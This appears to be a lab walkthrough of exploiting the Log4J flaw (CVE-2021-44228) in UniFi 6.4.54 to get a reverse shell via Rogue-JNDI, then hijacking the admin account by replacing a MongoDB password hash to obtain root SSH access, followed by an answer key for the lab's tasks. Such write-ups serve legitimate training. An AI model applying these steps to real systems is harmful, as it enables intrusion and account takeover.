Table of Contents
This write-up explores the effects of exploiting Log4J in a very well-known network appliance monitoring system called "UniFi".
This box will show you how to set up and install the necessary packages and tools to exploit UniFi by abusing the Log4J vulnerability and manipulating a POST header called to remember, giving you a reverse shell on the machine. You'll also change the administrator's password by altering the hash saved in the MongoDB instance that is running on the system, which will allow access to the administration panel and lead to the disclosure of the administrator's SSH password.
Enumeration
Click on Spawn Machine to get the target IP address:
Scan Network scan using Nmap
- -sC: Performs a script scan using the default set of scripts
- -sV: Version detection
The scan reveals port 8080 open running an HTTP proxy. The proxy appears to redirect requests to port 8443, which seems to be running an SSL web server. We take note that the HTTP title of the page on port 8443 is " UniFi Network ".
Upon accessing the page using a browser we are presented with the UniFi web portal login page and the version number is 6.4.54. If we ever come across a version number it’s always a great idea to research that particular version on Google.
Exploiting UniFi 6.4.54 with Log4j Vulnerability
A quick Google search using the keywords "UniFi 6.4.54 exploit" reveals an article that discusses the in-depth exploitation of the CVE-2021-44228 vulnerability within this application.
- Learn More:
Another Log4j on the Fire: Unifi
This resource provides insights into the Log4j vulnerability's impact on the Unifi platform. It discusses the vulnerability's exploitation, its implications for Unifi users, and recommendations for mitigating the risk.
This
Log4J vulnerability
can be exploited by injecting
operating system commands (OS Command Injection), which is a web security
vulnerability that allows an attacker to execute arbitrary operating system
commands on the server that is running the application and typically fully
compromise the application and all its data.
To determine if this is the case, we can use Foxy Proxy
after making a POST request to the /api/login endpoint, to pass on the
request to BurpSuite, which will intercept it as a middle-man. The request can
then be edited to inject commands. We provide a great module based on
intercepting web requests.
First, we attempt to log in to the page with the credentials test, as we aren’t trying to validate or gain access. The login request will be captured by BurpSuite and we will be able to modify it.
Before we modify the request, let's send this HTTPS packet to the Repeater module of BurpSuite by pressing CTRL+R.
Gaining Reverse Shell through JNDI:LDAP Exploitation
The Exploitation section of the previously mentioned article mentions that we have to input our payload into the remember parameter. Because the POST data is being sent as a JSON object and because the payload contains brackets {}, in order to prevent it from being parsed as another JSON object we enclose it inside brackets " so that it is parsed as a string instead.
We input the payload into the remember field as shown above so that we can identify an injection point if one exists. If the request causes the server to connect back to us, then we have verified that the application is vulnerable.
- JNDI is the acronym for the Java Naming and Directory Interface API. By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems, such as database servers and messaging systems.
- LDAP is the acronym for Lightweight Directory Access Protocol, which is an open, vendor-neutral, industry-standard application protocol for accessing and maintaining distributed directory information services over the Internet or a Network. The default port that LDAP runs on is port 389.
After we hit "send" the "Response" pane will display the response from the request. The output shows us an error message stating that the payload is invalid, but despite the error message the payload is actually being executed.
Let's proceed to start tcpdump on port 389, which will monitor the network traffic for LDAP connections.
Analyze the Data network using TCPDump
Tcpdump is a data-network packet analyzer computer program that runs under a command-line interface. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
Open up another terminal and type:
The above syntax can be broken down as follows:
- sudo: Run this via root also known as admin.
- tcpdump: This is the program or software that is Wireshark except, it's a command-line version.
- -i: Selecting interface. (Example eth0, wlan0, tun0)
- port 389: Select the port we are listening on.
After tcpdump has been started, click again the Send button on burp suite:
The tcpdump output shows a connection being received on our machine.
This proves that the application is indeed vulnerable since it is
trying to connect back to us on the LDAP port 389.
Rogue-JNDI Remote Code Execution
We will have to install Open-JDK and Maven on our system in
order to build a payload that we can send to the server which will give us
Remote
Code Execution
on the vulnerable system.
Open-JDK is the Java Development Kit, which is used to build Java applications. Maven on the other hand is an Integrated Development Environment (IDE) that can be used to create a structured project and compile our projects into jar files.
Open JDK comes pre-installed with Parrot and Kali:
These applications will also help us run the rogue-JNDI Java application, which starts a local LDAP server and allows us to receive connections back from the vulnerable server and execute malicious code.
Once we have installed Open-JDK, we can proceed to install Maven. But first, let’s switch to the root user.
Once we have installed the required packages, we now need to download and build the Rogue-JNDI Java application. Let's clone the respective repository and build the package using Maven.
Run the command to build the package using Maven:
This will create a .jar file in
rogue-jndi/target/
directory
called RogueJndi-1.1.jar. Now we can construct our payload to pass into the
RogueJndi-1-1.jar Java application.
To use the Rogue-JNDI server we will have to construct and
pass it a payload, which will be responsible for giving us a shell on the
affected system. We will be Base64 to encode the payload to prevent any encoding
issues.
Note: For this walkthrough, we will be using port 4444 to receive the shell.
After the payload has been created, start the Rogue-JNDI application while passing in the payload as part of the --command option and your tun0 IP address to the --hostname option.
Now that the server is listening locally on port 1389, let's open another terminal and start a Netcat listener to capture the reverse shell.
Going back to our intercepted POST request and click send.
Once we receive the output from the Rogue server, a shell spawns on our Netcat listener:
Privilege Escalation
Now, we can get access to the administrator panel of the UniFi application and possibly extract SSH secrets used between the appliances.
UniFi Administrator Panel Exploitation for SSH Access
First let's check if MongoDB is running on the target system, which might make it possible for us to extract credentials in order to login into the administrative panel. We can see MongoDB is running on the target system on port 27117.
Let's interact with the MongoDB service by making use of the Mongo command-line utility and attempting to extract the administrator password.
The output reveals a user called Administrator. Their password hash is located in the x_shadow variable but in this instance, it cannot be cracked with any password-cracking utilities. Instead, we can change the x_shadow password hash with our very own created hash in order to replace the administrator's password and authenticate to the administrative panel. To do this we can use the mk passwd command-line utility.
Open a new terminal and type the below command:
Once we've generated the SHA-512 hash the output will look similar to the one above, however, due to the salt, the hash will change every time it is generated.
A salt is added to the hashing process to force their uniqueness, increase their complexity without increasing user requirements, and to mitigate password attacks like hash tables.
Let's proceed to replace the existing hash with the one we created:
Let's now visit the website and log in as administrators. It is very important to note that the username is case-sensitive.
The authentication process was successful and we now have administrative access to the UniFi application.
UniFi
offers a setting for SSH Authentication, which is a
functionality that allows you to administer other Access Points over SSH from a
console or terminal.
Navigate to settings -> site , scroll down to find the SSH Authentication setting. SSH authentication with a root password has been enabled.
The page shows the root password in plaintext. Let's attempt to authenticate to the system as root over SSH.
Congratulations, you have finished the Unified box.
TASK Solutions
TASK 1: What ports are open?
Ans. 22,6789,8080,8443TASK 2: Name of the software that is running on the highest port?
Ans. UniFi NetworkTASK 3: What is the version of the software that is running?
Ans. 6.4.54TASK 4: What is the CVE for the identified vulnerability?
Ans. CVE-2021-44228TASK 5: What is the version of Maven that we installed?
Ans. 3.6.3TASK 6: What protocol does JDNI leverage in the injection?
Ans. LDAPTASK 7: What tool do we use to intercept the traffic, indicating the attack was successful?
Ans. tcpdumpTASK 8: What port do we need to inspect intercepted traffic for?
Ans. 389TASK 9: What port is the MongoDB service running on?
Ans. 27117TASK 10: What is the default database name for UniFi applications?
Ans. aceTASK 11: What is the function we use to enumerate users within the database in MongoDB?
Ans. db.admin.find()TASK 12: What is the function to add data to the database in MongoDB?
Ans. db.admin.insert()TASK 13: What is the function we use to update users within the database in MongoDB?
Ans. db.admin.update()TASK 14: What is the password for the root user?
Ans. NotACrackablePassword4U2022
Dear Team
ReplyDeletecould we to see your video other youtube , because we see the youtube your account has been suspended , could we to get your email or email me to [email protected]
Thanks we intrested your all video
Delete